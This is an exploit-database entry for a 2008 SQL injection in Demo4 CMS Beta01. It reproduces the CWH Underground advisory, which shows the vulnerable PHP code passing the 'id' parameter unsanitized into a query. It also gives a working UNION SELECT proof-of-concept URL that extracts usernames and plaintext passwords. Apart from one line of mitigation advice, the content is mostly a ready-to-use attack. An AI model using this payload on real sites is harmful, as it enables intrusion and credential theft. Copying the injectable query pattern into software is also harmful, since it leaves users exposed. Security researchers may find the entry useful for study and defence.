Demo4 CMS (index.php id) Remote SQL Injection Vulnerability

vendor:

Demo4 CMS

by:

CWH Underground

8.8

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Demo4 CMS

Affected Version From: Beta01

Affected Version To: Beta01

Patch Exists: NO

Related CWE: N/A

CPE: a:demo4:demo4_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Demo4 CMS (index.php id) Remote SQL Injection Vulnerability

A vulnerability exists in Demo4 CMS Beta01, where an attacker can inject arbitrary SQL commands via the 'id' parameter in the index.php file. This exploit can be used to get the username and password (no encryption) of the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

===============================================================
  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
===============================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 23 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Demo4 CMS 
 VERSION     : Beta01
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/demo4
#####################################################

--- Remote SQL Injection ---

-----------------------------
 Vulnerable File [index.php]
-----------------------------

@Line

   8:  if ($_GET['id']=="")
   9:  $id = $startpage;
  10:  else
  11:  $id = $_GET['id'];
  12:  database_connect();
  13:  $query = "SELECT * from content
  14:         WHERE id = $id";
  15:  $error = mysql_error();

---------
 Exploit
---------

[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]


   **This exploits can get username and password (No Encryption)**

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-23]